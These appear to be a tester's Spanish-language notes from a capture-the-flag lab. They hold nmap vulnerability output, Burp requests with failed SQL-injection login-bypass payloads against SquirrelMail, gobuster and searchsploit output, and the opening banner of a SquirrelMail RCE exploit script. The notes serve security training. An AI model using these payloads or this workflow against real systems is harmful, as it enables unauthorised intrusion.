|       CVE-2022-29404  5.0     https://vulners.com/cve/CVE-2022-29404
|       CVE-2022-28614  5.0     https://vulners.com/cve/CVE-2022-28614
|       CVE-2022-26377  5.0     https://vulners.com/cve/CVE-2022-26377
|       CVE-2022-22719  5.0     https://vulners.com/cve/CVE-2022-22719
|       CVE-2021-34798  5.0     https://vulners.com/cve/CVE-2021-34798
|       CVE-2021-33193  5.0     https://vulners.com/cve/CVE-2021-33193
|       CVE-2021-26690  5.0     https://vulners.com/cve/CVE-2021-26690
|       CVE-2020-1934   5.0     https://vulners.com/cve/CVE-2020-1934
|       CVE-2019-17567  5.0     https://vulners.com/cve/CVE-2019-17567
|       CVE-2019-0220   5.0     https://vulners.com/cve/CVE-2019-0220
|       CVE-2019-0196   5.0     https://vulners.com/cve/CVE-2019-0196
|       CVE-2018-17199  5.0     https://vulners.com/cve/CVE-2018-17199
|       CVE-2018-17189  5.0     https://vulners.com/cve/CVE-2018-17189
|       CVE-2018-1333   5.0     https://vulners.com/cve/CVE-2018-1333
|       CVE-2018-1303   5.0     https://vulners.com/cve/CVE-2018-1303
|       CVE-2017-9798   5.0     https://vulners.com/cve/CVE-2017-9798
|       CVE-2017-15710  5.0     https://vulners.com/cve/CVE-2017-15710
|       CVE-2016-8743   5.0     https://vulners.com/cve/CVE-2016-8743
|       CVE-2016-8740   5.0     https://vulners.com/cve/CVE-2016-8740
|       CVE-2016-4979   5.0     https://vulners.com/cve/CVE-2016-4979
|       CVE-2006-20001  5.0     https://vulners.com/cve/CVE-2006-20001
|       CNVD-2023-93320 5.0     https://vulners.com/cnvd/CNVD-2023-93320
|       CNVD-2023-80558 5.0     https://vulners.com/cnvd/CNVD-2023-80558
|       CNVD-2022-73122 5.0     https://vulners.com/cnvd/CNVD-2022-73122
|       CNVD-2022-53584 5.0     https://vulners.com/cnvd/CNVD-2022-53584
|       CNVD-2022-53582 5.0     https://vulners.com/cnvd/CNVD-2022-53582
|       CNVD-2022-03223 5.0     https://vulners.com/cnvd/CNVD-2022-03223
|       C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B    5.0     https://vulners.com/githubexploit/C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B  *EXPLOIT*
|       BD3652A9-D066-57BA-9943-4E34970463B9    5.0     https://vulners.com/githubexploit/BD3652A9-D066-57BA-9943-4E34970463B9  *EXPLOIT*
|       B0208442-6E17-5772-B12D-B5BE30FA5540    5.0     https://vulners.com/githubexploit/B0208442-6E17-5772-B12D-B5BE30FA5540  *EXPLOIT*
|       A820A056-9F91-5059-B0BC-8D92C7A31A52    5.0     https://vulners.com/githubexploit/A820A056-9F91-5059-B0BC-8D92C7A31A52  *EXPLOIT*
|       9814661A-35A4-5DB7-BB25-A1040F365C81    5.0     https://vulners.com/githubexploit/9814661A-35A4-5DB7-BB25-A1040F365C81  *EXPLOIT*
|       5A864BCC-B490-5532-83AB-2E4109BB3C31    5.0     https://vulners.com/githubexploit/5A864BCC-B490-5532-83AB-2E4109BB3C31  *EXPLOIT*
|       17C6AD2A-8469-56C8-BBBE-1764D0DF1680    5.0     https://vulners.com/githubexploit/17C6AD2A-8469-56C8-BBBE-1764D0DF1680  *EXPLOIT*
|       1337DAY-ID-28573        5.0     https://vulners.com/zdt/1337DAY-ID-28573        *EXPLOIT*
|       OSV:BIT-APACHE-2020-11993       4.3     https://vulners.com/osv/OSV:BIT-APACHE-2020-11993
|       OSV:BIT-APACHE-2020-11985       4.3     https://vulners.com/osv/OSV:BIT-APACHE-2020-11985
|       FF610CB4-801A-5D1D-9AC9-ADFC287C8482    4.3     https://vulners.com/githubexploit/FF610CB4-801A-5D1D-9AC9-ADFC287C8482  *EXPLOIT*
|       FDF4BBB1-979C-5320-95EA-9EC7EB064D72    4.3     https://vulners.com/githubexploit/FDF4BBB1-979C-5320-95EA-9EC7EB064D72  *EXPLOIT*
|       FCAF01A0-F921-5DB1-BBC5-850EC2DC5C46    4.3     https://vulners.com/githubexploit/FCAF01A0-F921-5DB1-BBC5-850EC2DC5C46  *EXPLOIT*
|       EDB-ID:50383    4.3     https://vulners.com/exploitdb/EDB-ID:50383      *EXPLOIT*
|       E7B177F6-FA62-52FE-A108-4B8FC8112B7F    4.3     https://vulners.com/githubexploit/E7B177F6-FA62-52FE-A108-4B8FC8112B7F  *EXPLOIT*
|       E6B39247-8016-5007-B505-699F05FCA1B5    4.3     https://vulners.com/githubexploit/E6B39247-8016-5007-B505-699F05FCA1B5  *EXPLOIT*
|       DBF996C3-DC2A-5859-B767-6B2FC38F2185    4.3     https://vulners.com/githubexploit/DBF996C3-DC2A-5859-B767-6B2FC38F2185  *EXPLOIT*
|       D0E79214-C9E8-52BD-BC24-093970F5F34E    4.3     https://vulners.com/githubexploit/D0E79214-C9E8-52BD-BC24-093970F5F34E  *EXPLOIT*
|       CVE-2020-11985  4.3     https://vulners.com/cve/CVE-2020-11985
|       CVE-2019-10092  4.3     https://vulners.com/cve/CVE-2019-10092
|       CVE-2018-1302   4.3     https://vulners.com/cve/CVE-2018-1302
|       CVE-2018-1301   4.3     https://vulners.com/cve/CVE-2018-1301
|       CVE-2018-11763  4.3     https://vulners.com/cve/CVE-2018-11763
|       CVE-2016-4975   4.3     https://vulners.com/cve/CVE-2016-4975
|       CVE-2016-1546   4.3     https://vulners.com/cve/CVE-2016-1546
|       CF47F8BF-37F7-5EF9-ABAB-E88ECF6B64FE    4.3     https://vulners.com/githubexploit/CF47F8BF-37F7-5EF9-ABAB-E88ECF6B64FE  *EXPLOIT*
|       CD48BD40-E52A-5A8B-AE27-B57C358BB0EE    4.3     https://vulners.com/githubexploit/CD48BD40-E52A-5A8B-AE27-B57C358BB0EE  *EXPLOIT*
|       C8C7BBD4-C089-5DA7-8474-A5B2B7DC5E79    4.3     https://vulners.com/githubexploit/C8C7BBD4-C089-5DA7-8474-A5B2B7DC5E79  *EXPLOIT*
|       C8799CA3-C88C-5B39-B291-2895BE0D9133    4.3     https://vulners.com/githubexploit/C8799CA3-C88C-5B39-B291-2895BE0D9133  *EXPLOIT*
|       C0380E16-C468-5540-A427-7FE34E7CF36B    4.3     https://vulners.com/githubexploit/C0380E16-C468-5540-A427-7FE34E7CF36B  *EXPLOIT*
|       BC027F41-02AD-5D71-A452-4DD62B0F1EE1    4.3     https://vulners.com/githubexploit/BC027F41-02AD-5D71-A452-4DD62B0F1EE1  *EXPLOIT*
|       B946B2A1-2914-537A-BF26-94B48FC501B3    4.3     https://vulners.com/githubexploit/B946B2A1-2914-537A-BF26-94B48FC501B3  *EXPLOIT*
|       B9151905-5395-5622-B789-E16B88F30C71    4.3     https://vulners.com/githubexploit/B9151905-5395-5622-B789-E16B88F30C71  *EXPLOIT*
|       B58E6202-6D04-5CB0-8529-59713C0E13B8    4.3     https://vulners.com/githubexploit/B58E6202-6D04-5CB0-8529-59713C0E13B8  *EXPLOIT*
|       B53D7077-1A2B-5640-9581-0196F6138301    4.3     https://vulners.com/githubexploit/B53D7077-1A2B-5640-9581-0196F6138301  *EXPLOIT*
|       A9C7FB0F-65EC-5557-B6E8-6AFBBF8F140F    4.3     https://vulners.com/githubexploit/A9C7FB0F-65EC-5557-B6E8-6AFBBF8F140F  *EXPLOIT*
|       9EE3F7E3-70E6-503E-9929-67FE3F3735A2    4.3     https://vulners.com/githubexploit/9EE3F7E3-70E6-503E-9929-67FE3F3735A2  *EXPLOIT*
|       9D511461-7D24-5402-8E2A-58364D6E758F    4.3     https://vulners.com/githubexploit/9D511461-7D24-5402-8E2A-58364D6E758F  *EXPLOIT*
|       9CEA663C-6236-5F45-B207-A873B971F988    4.3     https://vulners.com/githubexploit/9CEA663C-6236-5F45-B207-A873B971F988  *EXPLOIT*
|       987C6FDB-3E70-5FF5-AB5B-D50065D27594    4.3     https://vulners.com/githubexploit/987C6FDB-3E70-5FF5-AB5B-D50065D27594  *EXPLOIT*
|       789B6112-E84C-566E-89A7-82CC108EFCD9    4.3     https://vulners.com/githubexploit/789B6112-E84C-566E-89A7-82CC108EFCD9  *EXPLOIT*
|       788F7DF8-01F3-5D13-9B3E-E4AA692153E6    4.3     https://vulners.com/githubexploit/788F7DF8-01F3-5D13-9B3E-E4AA692153E6  *EXPLOIT*
|       749F952B-3ACF-56B2-809D-D66E756BE839    4.3     https://vulners.com/githubexploit/749F952B-3ACF-56B2-809D-D66E756BE839  *EXPLOIT*
|       6E484197-456B-55DF-8D51-C2BB4925F45C    4.3     https://vulners.com/githubexploit/6E484197-456B-55DF-8D51-C2BB4925F45C  *EXPLOIT*
|       68E78C64-D93A-5E8B-9DEA-4A8D826B474E    4.3     https://vulners.com/githubexploit/68E78C64-D93A-5E8B-9DEA-4A8D826B474E  *EXPLOIT*
|       6758CFA9-271A-5E99-A590-E51F4E0C5046    4.3     https://vulners.com/githubexploit/6758CFA9-271A-5E99-A590-E51F4E0C5046  *EXPLOIT*
|       674BA200-C494-57E6-B1B4-1672DDA15D3C    4.3     https://vulners.com/githubexploit/674BA200-C494-57E6-B1B4-1672DDA15D3C  *EXPLOIT*
|       5A54F5DA-F9C1-508B-AD2D-3E45CD647D31    4.3     https://vulners.com/githubexploit/5A54F5DA-F9C1-508B-AD2D-3E45CD647D31  *EXPLOIT*
|       4E5A5BA8-3BAF-57F0-B71A-F04B4D066E4F    4.3     https://vulners.com/githubexploit/4E5A5BA8-3BAF-57F0-B71A-F04B4D066E4F  *EXPLOIT*
|       4C79D8E5-D595-5460-AA84-18D4CB93E8FC    4.3     https://vulners.com/githubexploit/4C79D8E5-D595-5460-AA84-18D4CB93E8FC  *EXPLOIT*
|       4B44115D-85A3-5E62-B9A8-5F336C24673F    4.3     https://vulners.com/githubexploit/4B44115D-85A3-5E62-B9A8-5F336C24673F  *EXPLOIT*
|       4013EC74-B3C1-5D95-938A-54197A58586D    4.3     https://vulners.com/githubexploit/4013EC74-B3C1-5D95-938A-54197A58586D  *EXPLOIT*
|       3CF66144-235E-5F7A-B889-113C11ABF150    4.3     https://vulners.com/githubexploit/3CF66144-235E-5F7A-B889-113C11ABF150  *EXPLOIT*
|       379FCF38-0B4A-52EC-BE3E-408A0467BF20    4.3     https://vulners.com/githubexploit/379FCF38-0B4A-52EC-BE3E-408A0467BF20  *EXPLOIT*
|       365CD0B0-D956-59D6-9500-965BF4017E2D    4.3     https://vulners.com/githubexploit/365CD0B0-D956-59D6-9500-965BF4017E2D  *EXPLOIT*
|       2E98EA81-24D1-5D5B-80B9-A8D616BF3C3F    4.3     https://vulners.com/githubexploit/2E98EA81-24D1-5D5B-80B9-A8D616BF3C3F  *EXPLOIT*
|       2B4FEB27-377B-557B-AE46-66D677D5DA1C    4.3     https://vulners.com/githubexploit/2B4FEB27-377B-557B-AE46-66D677D5DA1C  *EXPLOIT*
|       1B75F2E2-5B30-58FA-98A4-501B91327D7F    4.3     https://vulners.com/githubexploit/1B75F2E2-5B30-58FA-98A4-501B91327D7F  *EXPLOIT*
|       1337DAY-ID-35422        4.3     https://vulners.com/zdt/1337DAY-ID-35422        *EXPLOIT*
|       1337DAY-ID-33575        4.3     https://vulners.com/zdt/1337DAY-ID-33575        *EXPLOIT*
|       1145F3D1-0ECB-55AA-B25D-A26892116505    4.3     https://vulners.com/githubexploit/1145F3D1-0ECB-55AA-B25D-A26892116505  *EXPLOIT*
|       108A0713-4AB8-5A1F-A16B-4BB13ECEC9B2    4.3     https://vulners.com/githubexploit/108A0713-4AB8-5A1F-A16B-4BB13ECEC9B2  *EXPLOIT*
|       0BC014D0-F944-5E78-B5FA-146A8E5D0F8A    4.3     https://vulners.com/githubexploit/0BC014D0-F944-5E78-B5FA-146A8E5D0F8A  *EXPLOIT*
|       06076ECD-3FB7-53EC-8572-ABBB20029812    4.3     https://vulners.com/githubexploit/06076ECD-3FB7-53EC-8572-ABBB20029812  *EXPLOIT*
|       05403438-4985-5E78-A702-784E03F724D4    4.3     https://vulners.com/githubexploit/05403438-4985-5E78-A702-784E03F724D4  *EXPLOIT*
|       00EC8F03-D8A3-56D4-9F8C-8DD1F5ACCA08    4.3     https://vulners.com/githubexploit/00EC8F03-D8A3-56D4-9F8C-8DD1F5ACCA08  *EXPLOIT*
|       CVE-2018-1283   3.5     https://vulners.com/cve/CVE-2018-1283
|       CVE-2016-8612   3.3     https://vulners.com/cve/CVE-2016-8612
|       CVE-2023-45802  2.6     https://vulners.com/cve/CVE-2023-45802
|       OSV:BIT-APACHE-2020-13938       2.1     https://vulners.com/osv/OSV:BIT-APACHE-2020-13938
|_      PACKETSTORM:152441      0.0     https://vulners.com/packetstorm/PACKETSTORM:152441      *EXPLOIT*
| http-enum: 
|   /squirrelmail/src/login.php: squirrelmail version 1.4.23 [svn]
|_  /squirrelmail/images/sm_logo.png: SquirrelMail
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=ip-10-10-37-190.eu-west-1.compute.internal
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://ip-10-10-37-190.eu-west-1.compute.internal:80/
|     Form id: 
|_    Form action: #
|_http-server-header: Apache/2.4.18 (Ubuntu)
110/tcp open  pop3        Dovecot pop3d
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 02:FE:2F:A7:DB:E9 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=2/3%OT=22%CT=1%CU=43544%PV=Y%DS=1%DC=D%G=Y%M=02FE2F%TM
OS:=65BD8F17%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10A%TI=Z%CI=I%II=I%
OS:TS=8)OPS(O1=M2301ST11NW7%O2=M2301ST11NW7%O3=M2301NNT11NW7%O4=M2301ST11NW
OS:7%O5=M2301ST11NW7%O6=M2301ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68
OS:DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M2301NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=
OS:40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%
OS:O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=4
OS:0%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%
OS:Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=
OS:Y%DFI=N%T=40%CD=S)

Network Distance: 1 hop
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb-vuln-ms10-061: false
|_smb-vuln-ms10-054: false
| smb-vuln-regsvc-dos: 
|   VULNERABLE:
|   Service regsvc in Microsoft Windows systems vulnerable to denial of service
|     State: VULNERABLE
|       The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
|       pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
|       while working on smb-enum-sessions.
|_          

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 344.52 seconds



------------------ BURPSUITE    ----------------


REQUEST DEL BOTON SKYNET SEARCH:




POST / HTTP/1.1
Host: 10.10.37.190
Content-Length: 20
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.37.190
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.37.190/
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9,en;q=0.8
Connection: close

submit=Skynet+Search



RESPONSE:

NO DEVUELVE NINGUN RESULTADO VISIBLE






REQUEST DEL BOTON iM FEELING LUCKY:



POST / HTTP/1.1
Host: 10.10.37.190
Content-Length: 25
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.37.190
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.37.190/
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9,en;q=0.8
Connection: close

lucky=I%27m+Feeling+Lucky



RESPONSE:



TAMPOCO DEVUELVE NADA POR EL MMOMMENTO.




REQUEST PROBANDO INYECCION BASICA PARA TARATAR DE SALTAR UN LOGEO SUPONIENDO QUE TENGAN UN SUAR ADMINISTRATOR; POR QUE LLAMA LA ATENCION LA VARIABLE SUBMID QUE USA PARA CARGAR EL PRIMER BOTON EN LA REQUEST CAPTURADA:




POST / HTTP/1.1
Host: 10.10.37.190
Content-Length: 33
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.37.190
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.37.190/
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9,en;q=0.8
Connection: close

submit=administrator' or 1=1 -- -



RESPONSE :


NO TUVIMOS RESULTADO FAVORABLE; NOS MUESTRA LA MISMA PAGINA







--------------------- GOBUSTER   ---------------




┌──(root㉿kali)-[~]
└─# gobuster dir -u http://10.10.37.190/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.37.190/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2024/02/03 01:12:21 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/admin                (Status: 301) [Size: 312] [--> http://10.10.37.190/admin/]
/config               (Status: 301) [Size: 313] [--> http://10.10.37.190/config/]
/css                  (Status: 301) [Size: 310] [--> http://10.10.37.190/css/]
/index.html           (Status: 200) [Size: 523]
/js                   (Status: 301) [Size: 309] [--> http://10.10.37.190/js/]
/server-status        (Status: 403) [Size: 277]
/squirrelmail         (Status: 301) [Size: 319] [--> http://10.10.37.190/squirrelmail/]
Progress: 4614 / 4615 (99.98%)===============================================================
2024/02/03 01:12:23 Finished
===============================================================











------------   ANALIZAMOS LAS RUTAS OBRTENISDAS CON NMAP SCRIPT VULN Y CON GOBUSTER:    --------------




http://10.10.37.190/squirrelmail/src/login.php



VEMOS EN LA WEB UNA VERSION DE SERVICIO SQUIRRELMAIL 1.4.23 SVN:


SquirrelMail Logo
SquirrelMail version 1.4.23 [SVN]
By the SquirrelMail Project Team
SquirrelMail Login
Name:	
Password:	




----



http://10.10.37.190/admin/



POR WEB NOS RESPONDIO QUE NO TENEMOS PERMISOS:



Forbidden
You don't have permission to access this resource.

Apache/2.4.18 (Ubuntu) Server at 10.10.37.190 Port 80




----------------



http://10.10.37.190/config/




TAMPOCO TENEMOS PERMISOS:


Forbidden
You don't have permission to access this resource.

Apache/2.4.18 (Ubuntu) Server at 10.10.37.190 Port 80





---------------- BURPSUITE       -------------



INTENTAMOS CAPATURARPARA VER LAS SOLICITUDES DEL LOGIN DEL SERVICIO SQUIRRELMAIL E INTENTAMOS CON REPITER HACER UNA INYECCION BASICA PARA SALTAR EL LOGIN COMO ADMIN; PERO NO FUNCIONO:



REQUEST:




POST /squirrelmail/src/redirect.php HTTP/1.1
Host: 10.10.37.190
Content-Length: 97
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.37.190
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.37.190/squirrelmail/src/login.php
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9,en;q=0.8
Cookie: squirrelmail_language=en_US; SQMSESSID=8r65d5g44c98aastt1rt02nkr5
Connection: close

login_username=administrator%27+or+1%3D1+--+-&secretkey=&js_autodetect_results=1&just_logged_in=1





RESPONSE CREO VEMOS ALGUNAS PISTAS POR AQUI :



HTTP/1.1 200 OK
Date: Sat, 03 Feb 2024 01:26:35 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: Sat, 1 Jan 2000 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Set-Cookie: SQMSESSID=8r65d5g44c98aastt1rt02nkr5; path=/squirrelmail/; HttpOnly
Set-Cookie: SQMSESSID=8r65d5g44c98aastt1rt02nkr5; path=/squirrelmail/; HttpOnly
Set-Cookie: SQMSESSID=8r65d5g44c98aastt1rt02nkr5; path=/squirrelmail/; HttpOnly
Set-Cookie: SQMSESSID=8r65d5g44c98aastt1rt02nkr5; path=/squirrelmail/; HttpOnly
Set-Cookie: SQMSESSID=8r65d5g44c98aastt1rt02nkr5; path=/squirrelmail/; HttpOnly
Set-Cookie: squirrelmail_language=en_US; expires=Mon, 04-Mar-2024 01:26:35 GMT; path=/squirrelmail/; HttpOnly
Set-Cookie: SQMSESSID=c6h59js459okqlh1lge91nfkj2; path=/squirrelmail/
Set-Cookie: SQMSESSID=c6h59js459okqlh1lge91nfkj2; path=/squirrelmail/; HttpOnly
Set-Cookie: SQMSESSID=c6h59js459okqlh1lge91nfkj2; path=/squirrelmail/; HttpOnly
Set-Cookie: SQMSESSID=8r65d5g44c98aastt1rt02nkr5; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/squirrelmail/; HttpOnly
Set-Cookie: SQMSESSID=8r65d5g44c98aastt1rt02nkr5; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/squirrelmail/src; HttpOnly
Set-Cookie: SQMSESSID=8r65d5g44c98aastt1rt02nkr5; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/squirrelmail/src/; HttpOnly
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Content-Length: 1789
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

<head>
<meta name="robots" content="noindex,nofollow">
<meta http-equiv="x-dns-prefetch-control" content="off">
<script type="text/javascript" language="JavaScript">
<!--
if (self != top) { try { if (document.domain != top.document.domain) { throw "Clickjacking security violation! Please log out immediately!"; /* this code should never execute - exception should already have been thrown since it's a security violation in this case to even try to access top.document.domain (but it's left here just to be extra safe) */ } } catch (e) { self.location = "/squirrelmail/src/signout.php"; top.location = "/squirrelmail/src/signout.php" } }
// -->
</script>

<title>SquirrelMail - Unknown user or password incorrect.</title>
<!--[if IE 6]>
<style type="text/css">
/* avoid stupid IE6 bug with frames and scrollbars */
body {
    width: expression(document.documentElement.clientWidth - 30);
}
</style>
<![endif]-->

</head>

<body text="#000000" bgcolor="#ffffff" link="#0000cc" vlink="#0000cc" alink="#0000cc">

<center><img src="../images/sm_logo.png" alt="SquirrelMail Logo" width="308" height="111" /><br />
<small>SquirrelMail version 1.4.23 [SVN]<br />By the SquirrelMail Project Team<br /></small>
<table cellspacing="1" cellpadding="0" bgcolor="#800000" width="70%"><tr><td><table width="100%" border="0" bgcolor="#ffffff" align="center"><tr><td bgcolor="#dcdcdc" align="center"><font color="#cc0000"><b>ERROR</b></font></td></tr><tr><td align="center">Unknown user or password incorrect.</td></tr><tr><td bgcolor="#dcdcdc" align="center"><font color="#cc0000"><b><a href="/squirrelmail/src/login.php" target="_top">Go to the login page</a></b></font></td></tr></table></td></tr></table></center></body></html>







LOS COMENTARIOS LLAMAN LA ATENSIONM POR AHORA YA LO VEREMOS:




/* este código nunca debería ejecutarse; ya debería haberse lanzado una excepción, ya que en este caso es una violación de seguridad incluso intentar acceder a top.document.domain (pero se deja aquí solo para mayor seguridad) */

<title>SquirrelMail: usuario desconocido o contraseña incorrecta.</title>
<!--[si IE 6]>
<tipo de estilo="texto/css">
/* evitar el estúpido error de IE6 con marcos y barras de desplazamiento */
cuerpo {
     ancho: expresión (document.documentElement.clientWidth - 30);
}
</estilo>
<![endif]-->

/squirrelmail/src/signout.php


SquirrelMail versión 1.4.23 [SVN]<br />Por el equipo del proyecto SquirrelMail





PROBAMOS EJECUTAR TAMBIEN ESTA RUTA QUE NOS SALIO EN EL RESPONSE POR QUE COMO QUE DECIA QUE ESTABAMOS LOGUESDOS TAMBIEN; NO SE COMPRENDIA BIEN; PERO AL EJECUTAR ESTA RUTA NOS AVISO QUE CERRAMOS SESION CORRECTAMENTE; Y NOS SALIO UN BOTON DE VOLVER A INICIAL, CAPTURAMNOS ESTAS REQUEST PARA JUNTAR MAS INFO, PERO EN FIN NOS VOOLVIO AL LOGIN:




http://10.10.37.190/squirrelmail/src/signout.php




REQUEST.

GET /squirrelmail/src/login.php HTTP/1.1
Host: 10.10.37.190
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.37.190/squirrelmail/src/signout.php
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9,en;q=0.8
Cookie: squirrelmail_language=en_US; SQMSESSID=07qt4gq6rtjgqb5k8t4oqicgn3
Connection: close





-------------------- SEARCHSPLOIT    -------------




┌──(root㉿kali)-[~]
└─# searchsploit SquirrelMail 1.4
----------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                 |  Path
----------------------------------------------------------------------------------------------- ---------------------------------
SquirrelMail 1.4.2 Address Add Plugin - 'add.php' Cross-Site Scripting                         | php/webapps/26305.txt
Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion                                       | php/webapps/27948.txt
SquirrelMail 1.4.x - Folder Name Cross-Site Scripting                                          | php/webapps/24068.txt
SquirrelMail < 1.4.22 - Remote Code Execution                                                  | linux/remote/41910.sh
SquirrelMail < 1.4.5-RC1 - Arbitrary Variable Overwrite                                        | php/webapps/43830.txt
SquirrelMail < 1.4.7 - Arbitrary Variable Overwrite                                            | php/webapps/43839.txt
----------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                            








┌──(root㉿kali)-[~]
└─# searchsploit -m linux/remote/41910.sh
  Exploit: SquirrelMail < 1.4.22 - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/41910
     Path: /usr/share/exploitdb/exploits/linux/remote/41910.sh
File Type: Bourne-Again shell script, ASCII text executable

Copied to: /root/41910.sh


                                                                                                                                 
┌──(root㉿kali)-[~]
└─# ls
41910.sh  Desktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos
                                                                                                                                 
┌──(root㉿kali)-[~]
└─# mv 41910.sh exploitpaimon.sh
                                                                                                                                 
┌──(root㉿kali)-[~]
└─# cat exploitpaimon.sh 
#!/bin/bash
#
int='\033[94m
     __                     __   __  __           __
    / /   ___  ____ _____ _/ /  / / / /___ ______/ /_____  __________
   / /   / _ \/ __ `/ __ `/ /  / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
  / /___/  __/ /_/ / /_/ / /  / __  / /_/ / /__/ ,< /  __/ /  (__  )
 /_____/\___/\__, /\__,_/_/  /_/ /_/\__,_/\___/_/|_|\___/_/  /____/
           /____/

SquirrelMail <= 1.4.23 Remote Code Execution PoC Exploit (CVE-2017-7692)

SquirrelMail_RCE_exploit.sh (ver. 1.1)

Discovered and coded by

Dawid Golunski (@dawid_golunski)
https://legalhackers.com

ExploitBox project:
https://ExploitBox.io

\033[0m'

# Quick and messy PoC for SquirrelMail webmail application.
# It contains payloads for 2 vectors:
# * File Write
# * RCE
# It requires user credentials and that SquirrelMail uses
# Sendmail method as email delivery transport
#
#
# Full advisory URL:
# https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html
# Exploit URL:
# https://legalhackers.com/exploits/CVE-2017-7692/SquirrelMail_RCE_exploit.sh
#
# Tested on: # Ubuntu 16.04
# squirrelmail package version:
# 2:1.4.23~svn20120406-2ubuntu1.16.04.1
#
# Disclaimer:
# For testing purposes only
#
#
# -----------------------------------------------------------------
#
# Interested in vulns/exploitation?
# Stay tuned for my new project - ExploitBox
#
#                        .;lc'
#                    .,cdkkOOOko;.
#                 .,lxxkkkkOOOO000Ol'
